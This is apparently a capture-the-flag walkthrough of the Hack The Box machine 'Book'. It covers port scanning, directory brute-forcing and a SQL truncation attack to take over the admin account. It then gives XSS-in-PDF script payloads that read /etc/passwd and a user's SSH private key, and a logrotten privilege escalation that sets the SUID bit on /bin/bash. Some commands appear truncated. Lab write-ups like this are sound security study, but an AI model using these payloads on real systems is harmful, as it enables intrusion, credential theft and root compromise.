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174 lines (88 loc) · 3.74 KB

File metadata and controls

174 lines (88 loc) · 3.74 KB
nmap -p- --min-rate 10000 -Pn

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After knowing open ports(22,80), let's do greater nmap scan.

nmap -A -sC -sV -p22,80 -Pn 

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I just enumerate website via my account.

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I just login via ' dr4ks' to application.

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Directory brute-forcing.

gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 40 -x php 

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I browsed '/admin' page and it returns that there is no 'register' option, we can only login, I tried credentials which I created, but doesn't work.

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I just enumerate users of this application via their emails that 'username@book.htb' for register section.

First, I tried via email 'admin@book.htb', and it says that user exists, that's why I know that there is user on db of application.

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Full HTTP request&response.

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SQL TRUNCATION Attack -> Here, I add spaces to end of email section, as a result, I can register an account via this email. I added spaces (+) manually, for 6 of them worked for our case.

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Why it is happening as because tells me the max string size in the DB is 20. So when the . is in position 21, it’s dropped, and I registered a user as admin@book.htb (with trailing spaces removed).

Now, I can login via below credentials (/admin endpoint)

admin@book.htb: dr4ks

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Now, I find XSS on non-admin site, that I malicious payloads into fields for book submission.

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I can see my malicious paylaod while generating PDF file.

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Let's add malicious javascript code that reads machine files.

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};"GET","file:///etc/passwd");x.send();</script>

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While opening a PDF file, it gives us like this answer.

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Let's read private key (id_rsa) file of 'reader' user.

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};"GET","file:///home/reader/.ssh/id_rsa");x.send();</script>

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Let's browse the page which we upload.

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I upload pspy64 tool to see hidden processes on our target system.

python3 -m http.server --bind 8080

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On target, I download a file.

cd /tmp

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Here, I see 'logrotate' process is running.

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I searched publicly known exploit for this.

I find this article for privilege escalation.

You can get Exploit script.

Let's compile malicious script via gcc.

gcc -o logrotten logrotten.c 

I also create malicious bash script which generates reverse shell.

My malicious bash script which add SUID bit into '/bin/bash' binary. (

chmod +s /bin/bash

Then, I execute script(logrotten).

echo Hello >> /home/reader/backups/access.log;./logrotten -p  /home/reader/backups/access.log

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Then, I tried many times bash -p command. One time, it worked.

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